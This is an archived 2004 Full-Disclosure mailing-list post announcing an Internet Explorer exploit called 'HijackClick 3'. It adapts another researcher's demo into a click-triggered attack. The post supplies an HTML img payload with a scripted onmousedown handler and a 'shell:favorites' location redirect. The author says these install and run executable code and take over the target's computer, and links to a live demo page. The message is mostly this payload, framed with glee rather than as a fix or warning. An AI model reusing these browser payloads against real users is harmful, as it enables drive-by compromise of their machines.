|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[Full-Disclosure] Brand New Hole: Internet Explorer: HijackClick 3
http-equiv
excite.com
Date: Mon Jul 12 2004 - 14:13:12 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Paul has posted a tantilizing demonstration to bugtraq today.
[see: http://www.securityfocus.com/archive/1/368652]
This Internet Explorer sure provides hours of free
entertainment. Let's install and run executable code on the
target computers for the hell of it. Paul's beautiful demo
tweaked as described below to do just that.
<!--
Microsoft just disabled those functions from
being called when the mouse button is down and called it
patched. No more hijackclick,
right?
Wrong.
-->
This is absolutely fantastic Paul, with a patented double-click
of the mouse we can remotely take over the target's computer:
Just substitute as follows:
1. <img src="greyhat.html" id=anch
onmousedown="parent.nsc.style.width=2000;parent.nsc.style.height=
2000;parent.pop.show(1,1,1,1);parent.setTimeout('showalert
()',3000);" style="width=168px;height=152px;background-image:url
('youlickit.gif');cursor:hand" title="click me!"></a>
2. location="shell:favorites\greyhat[1].htm"
Someone was querying the other day whether shell in Internet
Explorer poses a problem [despite repeated demonstrations].
Pah ! Probably not.
Quick and Dirty Working Demo:
http://www.malware.com/paul.html
--
http://www.malware.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]